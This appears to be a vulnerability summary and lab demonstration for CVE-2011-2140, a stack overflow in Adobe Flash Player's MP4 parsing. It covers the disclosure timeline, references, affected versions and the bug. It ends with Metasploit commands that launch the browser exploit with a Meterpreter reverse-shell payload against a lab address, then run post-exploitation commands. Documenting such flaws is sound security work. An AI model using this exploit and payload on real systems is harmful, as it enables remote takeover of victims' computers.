Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2011-02-10
Coordinated public release of the vulnerability the 2011-08-23
Vulnerability reported exploited in the wild in November 2011
First PoC provided by Abysssec the 2012-01-31
Metasploit PoC provided the 2012-02-10

PoC provided by :

Alexander Gavrun
Abysssec
sinn3r

Reference(s) :

CVE-2011-2140
OSVDB-74439
ZDI-11-276
APSB11-21

Affected version(s) :

Adobe Flash Player 10.3.181.36 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 10.3.181.34
Longtail SWF Player
Internet Explorer 7

Description :

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

Commands :

use exploit/windows/browser/adobe_flash_sps
set SRVHOST 192.168.178.100
set SWF_PLAYER_URI http://192.168.178.100/mediaplayer/player.swf
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid